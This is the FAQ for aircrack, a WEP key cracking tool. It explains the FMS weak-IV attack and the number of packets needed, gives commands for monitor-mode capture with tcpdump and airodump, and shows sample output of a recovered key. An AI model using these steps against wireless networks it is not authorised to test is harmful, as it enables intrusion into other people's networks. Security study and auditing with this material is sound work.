

    --[ What is aircrack ?
      
aircrack is a 802.11 WEP key cracker.  It implements the classical
Fluhrer-Mantin-Shamir (FMS)  attack, along with some optimizations
proposed by David Hulton. When enough encrypted packets  have been
gathered, aircrack can recover the WEP key in a matter of minutes.


    --[ How does aircrack work ?

Each encrypted data packet has an associated 3-byte initialization
vector (IV);  aircrack looks for  so-called  "weak IVs"  that leak
information about  bytes of the key. There's a 5%  chance that one
weak IV will point to the correct keybyte, thus about >60 weak IVs
are needed to recover one keybyte at a time.  However it should be
noted  that the set  of weak IVs for each  keybyte depends one the
previous keybytes.


    --[ How many packets are needed for recovering a WEP key ?

Regardless of the key size  (5 or 13 bytes), you'll need about two
million unique IVs to be sure  to find the correct key.  If you're
lucky or very patient, one million unique IVs might be enough.


    --[ Is aircrack different from AirSnort ?

It is somewhat more efficient since AirSnort only knows about 9000
weak IVs - whereas aircrack considers all possibly weak IVs, which
are distributed as follows:

    keybyte     # of weak IVs

          0               768
          1            131328
          2            197376
          3            197120
          4            328703
          5            328192
          6            459520
          7            459264
          8            590592
          9            590336
         10            721664
         11            721408
         12            852736


    --[ How do I capture packets ?

First of all, you have to put the wireless interface in monitoring
mode; for example, if you have a Prism2 card and use linux-wlan-ng:

wlanctl-ng wlan0 lnxreq_ifstate ifstate=enable
wlanctl-ng wlan0 lnxreq_wlansniff enable=true channel=<AP channel>
ifconfig wlan0 up

Alternatively, if you use the more stable & friendly hostap driver:

ifconfig wlan0 up
iwconfig wlan0 mode Monitor
iwconfig wlan0 channel <AP channel>
iwconfig wlan0 sensitivity 3
iwpriv wlan0 monitor_type 0

Then run a capture program such as tcpdump or airodump:

 tcpdump -i wlan0 -s 0 -w pcap_out
airodump -e wlan0 pcap_out

I'd recommend you use airodump instead of  tcpdump, because it has
more useful filtering options like -b or -e, and  can handle large
(> 2 GB) capture files.


    --[ How can I run aircrack in the background ?

For this purpose, you may use the "screen" program.

    . Starting a new session: screen -t title
    . Detaching a session: Ctrl-a <release> d
    . Reattaching a session:  screen -r


    --[ How do I know when aircrack finds the key ?

Your screen will look like:

    ---------------------------------------------------------------

                                 aircrack 1.0

   * Got 993675 unique IVs
   * Elapsed time [00:00:01]
   * Tried 18 keys at 18 k/s
   * Current [A4:4B:79:2A:81:C0:06:92:D4:B4:1F:FA:81]

   Byte  0: weaks =   32! depth =  0/ 20, best = A4(  2) 06(  1) 09(  1) 
   Byte  1: weaks =   28! depth =  1/ 10, best = 4B(  2) C3(  2) 02(  1) 
   Byte  2: weaks =   86  depth =  1/  3, best = 79(  3) 15(  2) 1D(  2) 
   Byte  3: weaks =   91  depth =  0/  3, best = 2A(  7) 23(  4) 38(  3) 
   Byte  4: weaks =  150  depth =  0/  1, best = 81(  6) 8A(  5) 16(  3) 
   Byte  5: weaks =  122  depth =  0/  2, best = C0(  7) 54(  3) 17(  2) 
   Byte  6: weaks =  192  depth =  0/  1, best = 06( 12) 15(  6) 3B(  4) 
   Byte  7: weaks =  317  depth =  0/  1, best = 92( 24) 0D(  5) 3F(  5) 
   Byte  8: weaks =  337  depth =  0/  1, best = D4( 24) B0(  5) F5(  5) 
   Byte  9: weaks =  302  depth =  0/  1, best = B4( 19) A4(  5) AC(  5) 
   Byte 10: weaks =  305  depth =  0/  1, best = 1F( 22) C1(  5) 11(  4) 
   Byte 11: weaks =  400  depth =  0/  1, best = FA( 19) 35(  7) 05(  6) 
   Byte 12: weaks =  319  depth =  0/  1, best = 81(  7) 50(  6) B1(  5) 

               KEY FOUND! [A4:4B:79:2A:81:C0:06:92:D4:B4:1F:FA:81]

    ---------------------------------------------------------------


    --[ I've got x million packets but aircrack doesn't find the key !

If possible, try gathering more encrypted  data packets; otherwise
consider increasing the fudge factor (-f 8).  Also, you should try
running aircrack with a different key size.


    --[ I've got x million packets but no weak IVs at all !

The wifi hardware that generated the IVs filters the weak ones, so
you're just plain out of luck.


